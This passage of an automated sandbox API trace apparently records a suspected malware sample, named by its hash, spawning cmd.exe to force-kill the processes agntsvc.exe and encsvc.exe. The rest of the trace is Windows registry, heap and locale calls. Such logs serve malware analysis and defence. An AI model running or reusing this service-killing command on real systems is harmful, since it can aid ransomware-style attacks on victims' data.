_StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0177.432] GetCurrentThreadId () returned 0xb0c [0177.432] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb0c) returned 0x78 [0177.432] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0177.432] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0177.432] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.443] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0177.443] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0177.443] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.443] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0177.443] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0177.443] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.443] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0177.443] GetConsoleOutputCP () returned 0x1b5 [0177.445] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0177.445] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0177.445] _get_osfhandle (_FileHandle=1) returned 0x140 [0177.446] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0177.446] _get_osfhandle (_FileHandle=1) returned 0x140 [0177.446] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0177.446] _get_osfhandle (_FileHandle=0) returned 0x13c [0177.446] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0177.446] GetEnvironmentStringsW () returned 0x5a7cd8* [0177.446] GetProcessHeap () returned 0x5a0000 [0177.446] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa1a) returned 0x5a8700 [0177.446] FreeEnvironmentStringsA (penv="A") returned 1 [0177.446] GetProcessHeap () returned 0x5a0000 [0177.447] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5a0550 [0177.447] GetEnvironmentStringsW () returned 0x5a7cd8* [0177.447] GetProcessHeap () returned 0x5a0000 [0177.447] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa1a) returned 0x5a9128 [0177.447] FreeEnvironmentStringsA (penv="A") returned 1 [0177.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.447] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0177.448] RegCloseKey (hKey=0x88) returned 0x0 [0177.448] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0177.448] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0177.449] RegCloseKey (hKey=0x88) returned 0x0 [0177.449] time (in: timer=0x0 | out: timer=0x0) returned 0x6234421f [0177.449] srand (_Seed=0x6234421f) [0177.449] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im agntsvc.exeencsvc.exe \"" [0177.449] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im agntsvc.exeencsvc.exe \"" [0177.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0177.449] GetProcessHeap () returned 0x5a0000 [0177.449] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x210) returned 0x5a9b50 [0177.449] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a9b58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0177.449] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0177.449] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0177.449] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.450] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0177.450] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0177.450] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0177.450] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0177.450] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0177.450] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0177.450] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0177.450] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0177.450] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0177.450] GetProcessHeap () returned 0x5a0000 [0177.451] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5a8700) returned 1 [0177.451] GetEnvironmentStringsW () returned 0x5a7cd8* [0177.451] GetProcessHeap () returned 0x5a0000 [0177.451] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa32) returned 0x5aa7a8 [0177.451] FreeEnvironmentStringsA (penv="A") returned 1 [0177.451] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0177.451] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0177.452] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0177.452] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0177.452] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0177.452] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0177.452] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0177.452] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0177.452] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0177.452] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0177.452] GetProcessHeap () returned 0x5a0000 [0177.452] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x44) returned 0x5a05c8 [0177.452] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0177.452] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0177.452] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0177.452] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5a0618 [0177.453] FindClose (in: hFindFile=0x5a0618 | out: hFindFile=0x5a0618) returned 1 [0177.453] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x5a0618 [0177.453] FindClose (in: hFindFile=0x5a0618 | out: hFindFile=0x5a0618) returned 1 [0177.453] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0177.453] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5a0618 [0177.453] FindClose (in: hFindFile=0x5a0618 | out: hFindFile=0x5a0618) returned 1 [0177.454] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0177.454] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0177.454] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0177.454] GetProcessHeap () returned 0x5a0000 [0177.454] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5aa7a8) returned 1 [0177.455] GetEnvironmentStringsW () returned 0x5a7cd8* [0177.455] GetProcessHeap () returned 0x5a0000 [0177.455] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xa76) returned 0x5a9d68 [0177.455] FreeEnvironmentStringsA (penv="=") returned 1 [0177.455] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0177.455] GetProcessHeap () returned 0x5a0000 [0177.455] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5a05c8) returned 1 [0177.455] GetProcessHeap () returned 0x5a0000 [0177.455] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x400e) returned 0x5abc68 [0177.456] GetProcessHeap () returned 0x5a0000 [0177.456] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x5e) returned 0x5aa7e8 [0177.456] GetProcessHeap () returned 0x5a0000 [0177.456] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4008) returned 0x5afc80 [0177.460] GetProcessHeap () returned 0x5a0000 [0177.460] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4008) returned 0x5b3c90 [0177.461] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0177.462] GetProcessHeap () returned 0x5a0000 [0177.462] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x418) returned 0x5aa850 [0177.462] SetErrorMode (uMode=0x0) returned 0x8003 [0177.462] SetErrorMode (uMode=0x1) returned 0x0 [0177.462] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x5aa858, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0177.462] SetErrorMode (uMode=0x8003) returned 0x1 [0177.462] GetProcessHeap () returned 0x5a0000 [0177.462] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5aa850, Size=0x90) returned 0x5aa850 [0177.463] GetProcessHeap () returned 0x5a0000 [0177.463] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5aa850) returned 0x90 [0177.463] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0177.463] GetProcessHeap () returned 0x5a0000 [0177.463] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x62) returned 0x5aa8e8 [0177.463] GetProcessHeap () returned 0x5a0000 [0177.463] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5aa958 [0177.463] GetProcessHeap () returned 0x5a0000 [0177.463] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5aa958, Size=0x62) returned 0x5aa958 [0177.463] GetProcessHeap () returned 0x5a0000 [0177.463] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5aa958) returned 0x62 [0177.463] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0177.463] GetProcessHeap () returned 0x5a0000 [0177.463] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xe0) returned 0x5aa9c8 [0177.469] GetProcessHeap () returned 0x5a0000 [0177.469] RtlReAllocateHeap (Heap=0x5a0000, Flags=0x0, Ptr=0x5aa9c8, Size=0x76) returned 0x5aa9c8 [0177.469] GetProcessHeap () returned 0x5a0000 [0177.469] RtlSizeHeap (HeapHandle=0x5a0000, Flags=0x0, MemoryPointer=0x5aa9c8) returned 0x76 [0177.469] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0177.469] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im agntsvc.exeencsvc.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0177.470] GetLastError () returned 0x3 [0177.470] GetProcessHeap () returned 0x5a0000 [0177.470] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5afc80) returned 1 [0177.470] GetProcessHeap () returned 0x5a0000 [0177.471] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5b3c90) returned 1 [0177.471] GetProcessHeap () returned 0x5a0000 [0177.471] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5abc68) returned 1 [0177.471] GetConsoleOutputCP () returned 0x1b5 [0177.472] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0177.472] GetUserDefaultLCID () returned 0x409 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0177.473] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0177.474] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0177.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0177.474] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0177.474] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0177.476] GetProcessHeap () returned 0x5a0000 [0177.476] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x20c) returned 0x5aaa90 [0177.476] GetConsoleTitleW (in: lpConsoleTitle=0x5aaa90, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0177.478] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0177.478] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0177.478] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0177.478] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0177.479] GetProcessHeap () returned 0x5a0000 [0177.479] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x400a) returned 0x5abc68 [0177.479] GetProcessHeap () returned 0x5a0000 [0177.479] RtlFreeHeap (HeapHandle=0x5a0000, Flags=0x0, BaseAddress=0x5abc68) returned 1 [0177.480] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0177.480] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0177.480] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0177.480] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0177.480] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0177.480] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0177.480] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0177.481] GetProcessHeap () returned 0x5a0000 [0177.481] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x58) returned 0x5aaca8 [0177.481] GetProcessHeap () returned 0x5a0000 [0177.481] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1a) returned 0x5a0578 [0177.481] GetProcessHeap () returned 0x5a0000 [0177.482] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x46) returned 0x5aad08 [0177.483] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0177.483] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0177.484] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0177.484] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0177.484] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0177.484] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0177.484] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0177.484] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0177.484] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0177.484] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0177.484] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0177.484] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0177.484] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0177.484] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0177.484] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0177.484] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0177.484] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0177.484] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0177.484] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0177.484] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0177.484] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0177.484] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0177.484] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0177.484] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0177.484] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0177.484] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0177.485] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0177.485] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0177.485] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0177.485] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0177.485] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0177.485] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0177.485] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0177.485] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0177.485] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0177.485] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0177.485] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0177.485] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0177.485] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0177.485] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0177.485] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0177.485] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0177.485] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0177.485] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0177.485] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0177.485] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0177.485] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0177.485] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0177.485] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0177.485] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0177.486] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0177.486] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0177.486] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0177.486] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0177.486] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0177.486] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0177.486] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0177.486] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0177.486] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0177.486] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0177.486] _wcsicmp (_String1="taskkill", 